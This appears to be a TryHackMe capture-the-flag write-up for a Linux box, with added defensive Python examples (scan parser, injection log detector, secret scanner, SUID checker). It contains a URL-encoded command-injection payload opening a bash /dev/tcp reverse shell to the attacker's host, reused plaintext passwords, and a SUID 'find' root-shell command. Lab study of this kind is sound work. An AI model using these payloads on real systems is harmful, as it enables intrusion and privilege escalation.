#tryhackme #linux #medium
![[Pasted image 20250704223411.png]]
---
# Information Gathering - Nmap
An initial TCP scan against all ports revealed 4 open ports: 21, 80, 10000, and 55007.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 20:03 CDT
Nmap scan report for 10.10.250.59
Host is up (0.13s latency).
Not shown: 65511 closed tcp ports (reset), 20 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
10000/tcp open snet-sensor-mgmt
55007/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 24.47 seconds
```
A service and default-script scan against those four ports gave more detail: anonymous FTP is allowed, port 10000 is Webmin, and SSH sits on the non-standard port 55007.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 21,80,10000,55007
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 20:37 CDT
Nmap scan report for 10.10.250.59
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.23.133.183
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
| 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.61 seconds
```
A UDP scan against the top 1,000 ports revealed one open port: 10000.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 20:11 CDT
Nmap scan report for 10.10.250.59
Host is up (0.13s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT STATE SERVICE
989/udp closed ftps-data
2967/udp closed symantec-av
3389/udp closed ms-wbt-server
5355/udp closed llmnr
10000/udp open ndmp
22124/udp closed unknown
38063/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 1.22 seconds
```
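Nmap's normal output is easy to read but awkward to compare across hosts or feed into a checklist. The parser below is an added example (not part of this writeup and not Nmap's own code): it turns the port lines and the NSE script lines that follow them into records, lists open ports per protocol, and applies a few triage rules of my own that surface exactly the three points the scans above raise. The input is the writeup's own scan output, reflowed and trimmed to the lines the parser cares about.

```python
import re
from dataclasses import dataclass, field

# Constructed input: the -sC -sV and UDP results from the scans above, trimmed to the
# lines a parser cares about (port lines and the NSE script lines that follow them).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.250.59
Host is up (0.13s latency).
PORT      STATE SERVICE          VERSION
21/tcp    open  ftp              vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http             Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
10000/tcp open  http             MiniServ 1.930 (Webmin httpd)
55007/tcp open  ssh              OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
10000/udp open  ndmp
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

# <port>/<proto> <state> <service> [<version...>]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE output lines for this port


def parse_nmap(text):
    """Turn Nmap normal output into PortRecord objects, attaching script lines to their port."""
    records = []
    current = None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = PortRecord(int(m.group(1)), m.group(2), m.group(3), m.group(4),
                                 (m.group(5) or "").strip())
            records.append(current)
        elif line.startswith("|") and current is not None:
            # "| ..." and "|_ ..." lines belong to the most recent port
            current.scripts.append(line.lstrip("|_ ").rstrip())
    return records


def open_ports(records, proto="tcp"):
    return [r.port for r in records if r.proto == proto and r.state == "open"]


def triage(records):
    """Simple defender-side triage rules (my own, not Nmap's) over the parsed results."""
    findings = []
    for r in records:
        script_text = " ".join(r.scripts)
        if "Anonymous FTP login allowed" in script_text:
            findings.append(f"{r.port}/{r.proto}: anonymous FTP login enabled")
        if r.service == "ssh" and r.port != 22:
            findings.append(f"{r.port}/{r.proto}: SSH on a non-standard port")
        if "Webmin" in r.version:
            findings.append(f"{r.port}/{r.proto}: Webmin admin interface exposed ({r.version})")
    return findings


if __name__ == "__main__":
    recs = parse_nmap(SAMPLE_NMAP_OUTPUT)
    print("open tcp:", open_ports(recs), "open udp:", open_ports(recs, "udp"))
    for finding in triage(recs):
        print("[!]", finding)
```

The regex keys on the `<port>/<proto>` prefix, so the `PORT STATE SERVICE` header and the trailing `Service Info:` line are ignored without special casing; for larger engagements, `nmap -oX` plus an XML parser is the more robust route, but this is enough to turn a pasted scan into something diffable.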
---
# Footprinting
##### Port 21
As the Nmap script output showed, I was able to log in as `anonymous`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ftp $IP
Connected to 10.10.250.59.
220 (vsFTPd 3.0.3)
Name (10.10.250.59:parallels): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```
There was only one file on the server, a hidden file named `.info.txt`.
```bash
ftp> ls -la
229 Entering Extended Passive Mode (|||46721|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 ..
-rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt
226 Directory send OK.
```
The content of `.info.txt` appears to be ROT13-encoded.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
```
Hahaha. Brilliant move from the creator of this box :)
![[Pasted image 20250704204401.png]]
##### Port 10000
Nmap tells us the version of the service on this port is `MiniServ 1.930`.
![[Pasted image 20250704203401.png]]
##### Port 80
The website hosted on port 80 is just an Apache2 Ubuntu Default Page.
![[Pasted image 20250704203153.png]]
`/robots.txt` lists some directories worth exploring and a line of random numbers.
![[Pasted image 20250704202349.png]]
With the help of `Gobuster`, I found `/joomla`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.250.59
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/manual (Status: 301) [Size: 313] [--> http://10.10.250.59/manual/]
/joomla (Status: 301) [Size: 313] [--> http://10.10.250.59/joomla/]
```
`/joomla` reveals a website page named `THM Boiler Room`. The path name itself is a hint that the site runs the `joomla` CMS.
![[Pasted image 20250704205937.png]]
I ran one more `gobuster` scan, this time against `/joomla`, and enumerated some directories that might hold useful information.
![[Pasted image 20250704211703.png]]
`/joomla/administrator` presents another login form. However, we haven't found any credentials yet.
![[Pasted image 20250704210946.png]]
The `/joomla/_files` page contains some interesting-looking strings, which appear to be base64-encoded.
![[Pasted image 20250704211306.png]]
It decodes to `Whopsie daisy`. Not sure where I could use this yet.
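Two of the strings found so far (`.info.txt` on the FTP share and the base64 text on `/joomla/_files`) are simple encodings rather than encryption. The script below is an added example, not part of the writeup: it recovers ROT13 text without assuming the shift (it tries all 26 Caesar shifts and picks the one with the most common English words), and it checks whether a token is valid base64 that decodes to printable text before trusting it. The ROT13 input is the `.info.txt` content above; the base64 sample is one I encoded myself from the phrase the page decodes, since the original string is only shown in a screenshot.

```python
import base64
import binascii
import re

# Constructed inputs: the .info.txt line from the FTP share, and a base64 string I
# produced from "Whopsie daisy" (the decoded phrase the page shows).
ROT13_SAMPLE = "Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!"
BASE64_SAMPLE = "V2hvcHNpZSBkYWlzeQ=="

# Small stop-word list used to rank Caesar candidates; enough for short hints like this one.
COMMON_WORDS = {"the", "to", "is", "it", "you", "and", "if", "of", "in", "see", "key"}


def caesar_shift(text, shift):
    """Rotate A-Z/a-z by `shift` places, leaving digits and punctuation untouched."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def rot13(text):
    return caesar_shift(text, 13)


def best_caesar_guess(text):
    """Try every shift and return (shift, plaintext) with the most common-word hits."""
    best_shift, best_text, best_score = 0, text, -1
    for shift in range(26):
        candidate = caesar_shift(text, shift)
        words = re.findall(r"[a-z]+", candidate.lower())
        hits = sum(w in COMMON_WORDS for w in words)
        if hits > best_score:
            best_shift, best_text, best_score = shift, candidate, hits
    return best_shift, best_text


BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_base64_candidate(token):
    """Return decoded text if `token` is well-formed base64 yielding printable text, else None."""
    if len(token) % 4 != 0 or not BASE64_RE.match(token):
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="replace")
    return text if text.isprintable() else None


if __name__ == "__main__":
    print(rot13(ROT13_SAMPLE))
    print(best_caesar_guess(ROT13_SAMPLE))
    print(decode_base64_candidate(BASE64_SAMPLE))
```

The brute-force ranking is what you want when a hint is "probably ROT-something" rather than definitely ROT13; the printable-text check on the base64 side stops you from "decoding" random alphanumeric strings that merely happen to have a valid length.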
![[Pasted image 20250704211448.png]]
# Exploit
`/joomla/_test` contains something very interesting that might lead to an exploit. It also has a file upload function.
![[Pasted image 20250704215212.png]]
Even before touching the file upload, I noticed that clicking the `New` button adds a `plot` parameter to the URL. That is well worth testing for command injection.
![[Pasted image 20250704220055.png]]
I appended `;id` after `NEW` and the output of the `id` command came back in the response, confirming that command injection works.
![[Pasted image 20250704220450.png]]
I injected the command below to get a reverse shell.
`http://10.10.250.59/joomla/_test/index.php?plot=NEW;bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.23.133.183%2F1234+0%3E%261%22`
Got a shell!
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Downloads]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.23.133.183] from (UNKNOWN) [10.10.250.59] 33010
bash: cannot set terminal process group (1130): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Vulnerable:/var/www/html/joomla/_test$ whoami
whoami
www-data
```
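The `plot` parameter worked because its value ends up on a shell command line unchanged, so `;` starts a second command. The target's `index.php` source is not shown, so the example below (added here, not the box's code) models that pattern in Python: a vulnerable command builder next to a hardened one that allowlists the value and passes it as a separate argv element, plus a small detector that runs over constructed Apache access log lines and flags query values containing shell metacharacters, including the URL-encoded reverse-shell request from above. `plot_tool` and the allowed action names are hypothetical.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# --- server side: a hypothetical handler for the `plot` parameter -----------------
# The real target is index.php and its source is not shown; this models the unsafe
# pattern behind "plot=NEW;id" and a hardened replacement.
PLOT_TOOL = "/usr/local/bin/plot_tool"      # hypothetical backend binary
ALLOWED_PLOTS = {"NEW", "OPEN", "SAVE"}     # hypothetical allowlist of valid actions


def build_command_vulnerable(plot):
    # Vulnerable: the raw parameter is spliced into a string that is handed to a
    # shell, so "NEW;id" becomes two commands.
    return f"{PLOT_TOOL} --plot {plot}"


def build_command_hardened(plot):
    # Hardened: allowlist the value and return an argv list, to be run without a
    # shell (subprocess.run(argv) in Python, proc_open with an array in PHP), so no
    # metacharacter is ever interpreted.
    if plot not in ALLOWED_PLOTS:
        raise ValueError(f"rejected plot value: {plot!r}")
    return [PLOT_TOOL, "--plot", plot]


def plot_accepted(plot):
    try:
        build_command_hardened(plot)
        return True
    except ValueError:
        return False


# --- detection side: spot injection attempts in Apache access logs ----------------
# Constructed log lines; the last one carries the reverse-shell URL used above.
ACCESS_LOG = [
    '10.23.133.183 - - [04/Jul/2025:20:03:10 -0500] "GET /joomla/_test/index.php?plot=NEW HTTP/1.1" 200 1234',
    '10.23.133.183 - - [04/Jul/2025:20:03:40 -0500] "GET /joomla/_test/index.php?plot=NEW;id HTTP/1.1" 200 1280',
    '10.23.133.183 - - [04/Jul/2025:20:04:50 -0500] "GET /joomla/_test/index.php?plot=NEW;bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.23.133.183%2F1234+0%3E%261%22 HTTP/1.1" 200 1234',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SHELL_META = re.compile(r"[;|&`$]|\bbash\b|/dev/tcp/")


def query_params(url):
    """Split the query string by hand so ';' inside a value is never treated as a separator."""
    params = []
    for pair in urlsplit(url).query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def suspicious_requests(lines):
    """Return (parameter, decoded value) for every query value containing shell metacharacters."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value in query_params(m.group(1)):
            if SHELL_META.search(value):
                hits.append((name, value))
    return hits


if __name__ == "__main__":
    print(build_command_vulnerable("NEW;id"))
    print(build_command_hardened("NEW"))
    for name, value in suspicious_requests(ACCESS_LOG):
        print(f"[!] possible injection in {name}: {value}")
```

The query string is split on `&` before percent-decoding, so the `%26` inside the payload stays part of the value rather than breaking it into a second parameter; that ordering matters for any detection that wants to see the decoded command in one piece.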
# Lateral Movement
`log.txt` appears to expose a set of credentials: `basterd:superduperp@$`
```bash
www-data@Vulnerable:/var/www/html/joomla/_test$ cat log.txt
cat log.txt
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
```
Confirmed the user `basterd` exists on the system.
```bash
www-data@Vulnerable:/var/www/html/joomla/_test$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
<SNIP>
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
stoner:x:1000:1000:stoner,,,:/home/stoner:/bin/bash
mysql:x:110:118:MySQL Server,,,:/nonexistent:/bin/false
basterd:x:1001:1001::/home/basterd:
ftp:x:111:119:ftp daemon,,,:/srv/ftp:/bin/false
sshd:x:112:65534::/var/run/sshd:/usr/sbin/nologin
```
Logged in as `basterd`.
```bash
www-data@Vulnerable:/home$ su basterd
Password:
basterd@Vulnerable:/home$ whoami
basterd
```
The `backup.sh` script in `/home/basterd` reveals the password of the user `stoner` in a comment.
```bash
basterd@Vulnerable:~$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
if [ -d "$SOURCE" ]; then
for i in `ls $SOURCE | grep 'data'`;do
echo "Begining copy of" $i >> $LOG
scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
echo $i "completed" >> $LOG
if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
rm $SOURCE/$i
echo $i "removed" >> $LOG
echo "####################" >> $LOG
else
echo "Copy not complete" >> $LOG
exit 0
fi
done
else
echo "Directory is not present" >> $LOG
exit 0
fi
```
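Both lateral moves came from a password left in plain text: an appended `#pass:` note in `log.txt`, and a commented-out password in `backup.sh`. The scanner below is an added example (not part of the writeup) of the check a defender would run over log files and scripts in home directories: it flags labelled `password`/`pass`/`secret` values anywhere in a line, and comment lines that consist of a single password-looking token. The inputs are constructed from the two files above.

```python
import re

# Constructed inputs: a tail of log.txt and the head of backup.sh from the box above.
LOG_TXT = """\
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
"""

BACKUP_SH = """\
REMOTE=1.2.3.4
SOURCE=/home/stoner
USER=stoner
#superduperp@$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
"""

# "password: x", "pass=x", "secret: x" anywhere in a line (case-insensitive)
LABELLED = re.compile(r"(?i)\b(pass(?:word|wd|phrase)?|pwd|secret|token)\s*[:=]\s*(\S+)")
# A comment line that is nothing but one token of 8+ characters with no spaces
COMMENT_TOKEN = re.compile(r"^\s*#\s*(\S{8,})\s*$")


def looks_like_secret(token):
    """Letters mixed with digits or punctuation; plain words like 'TODOfixme' are skipped."""
    has_alpha = re.search(r"[A-Za-z]", token)
    has_other = re.search(r"[0-9!@#$%^&*?_\-]", token)
    return bool(has_alpha and has_other)


def scan_for_secrets(text, source):
    """Return (source, line number, rule, value) for each suspected credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LABELLED.search(line)
        if m:
            findings.append((source, lineno, "labelled", m.group(2)))
            continue
        m = COMMENT_TOKEN.match(line)
        if m and looks_like_secret(m.group(1)):
            findings.append((source, lineno, "comment-token", m.group(1)))
    return findings


if __name__ == "__main__":
    for finding in scan_for_secrets(LOG_TXT, "log.txt") + scan_for_secrets(BACKUP_SH, "backup.sh"):
        print(finding)
```

Note that the sshd line contains the word `password` legitimately (`Accepted password for`); the labelled rule only fires when the keyword is followed by `:` or `=`, which is what separates the appended note from the normal log text.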
Successfully logged in as `stoner`.
```bash
basterd@Vulnerable:~$ su stoner
Password:
stoner@Vulnerable:/home/basterd$ whoami
stoner
```
# Privilege Escalation
The creator of the box got me again.
```bash
stoner@Vulnerable:~$ sudo -l
User stoner may run the following commands on Vulnerable:
(root) NOPASSWD: /NotThisTime/MessinWithYa
```
Looking for files with the SUID bit set.
```bash
stoner@Vulnerable:/opt$ find / -type f -perm -4000 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
```
Among the binaries, `/usr/bin/find` stood out, because `find` does not normally have the SUID bit set.
```bash
stoner@Vulnerable:/opt$ ls -la /usr/bin/find
-r-sr-xr-x 1 root root 232196 Feb 8 2016 /usr/bin/find
```
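Spotting `/usr/bin/find` by eye works on a short list, but the repeatable way is to diff the SUID inventory against a baseline and to flag any setuid binary that can spawn a shell or run arbitrary commands. The script below is an added example, not part of the writeup: it parses the `find` listing above, compares it to a baseline I built by hand from that listing (in practice, take the baseline from a clean reference host), checks basenames against a small list of shell-capable programs, and parses an `ls -l` mode string such as `-r-sr-xr-x` for the setuid/setgid bits. `is_setuid` is the live equivalent using `os.stat`.

```python
import os
import stat

# Constructed input: the `find / -type f -perm -4000` listing from above.
SUID_LISTING = """\
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
"""

# Assumed baseline: hand-built from the listing above minus the binary that does not
# belong. On a real engagement, generate this from a clean host of the same release.
EXPECTED_SUID = {
    "/bin/su", "/bin/fusermount", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/ping",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/apache2/suexec-custom",
    "/usr/lib/apache2/suexec-pristine", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/newgidmap", "/usr/bin/at", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/bin/pkexec",
    "/usr/bin/gpasswd", "/usr/bin/newuidmap",
}

# Programs that can execute other commands or drop to a shell; none of these should
# ever carry the setuid bit (my own short list, not exhaustive).
SHELL_CAPABLE = {"find", "bash", "sh", "dash", "python", "python3", "perl", "vim", "vi", "less", "more"}


def unexpected_suid(listing, baseline):
    """Paths in the listing that are not in the baseline."""
    return sorted(p for p in listing.split() if p not in baseline)


def shell_capable_suid(listing):
    """Setuid paths whose basename is a known shell-capable program."""
    return sorted(p for p in listing.split() if os.path.basename(p) in SHELL_CAPABLE)


def mode_bits(mode_string):
    """Parse the 10-character mode from `ls -l`; return (setuid, setgid, world_writable)."""
    setuid = mode_string[3] in "sS"          # owner execute slot
    setgid = mode_string[6] in "sS"          # group execute slot
    world_writable = mode_string[8] == "w"   # other write slot
    return setuid, setgid, world_writable


def is_setuid(path):
    """Live check on a real file, for when you are on the box rather than reading a paste."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


if __name__ == "__main__":
    print("not in baseline:", unexpected_suid(SUID_LISTING, EXPECTED_SUID))
    print("shell-capable:", shell_capable_suid(SUID_LISTING))
    print("mode of /usr/bin/find as listed above:", mode_bits("-r-sr-xr-x"))
```

The two checks are deliberately independent: a baseline diff catches anything unusual for the host, while the shell-capable list catches a dangerous binary even on a host whose baseline was never recorded. The remediation for this box's case is simply `chmod u-s /usr/bin/find`.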
I checked `gtfobins.github.io` for the `find` entry and got a root shell :)
```bash
stoner@Vulnerable:/opt$ find . -exec /bin/sh -p \; -quit
# whoami
root
```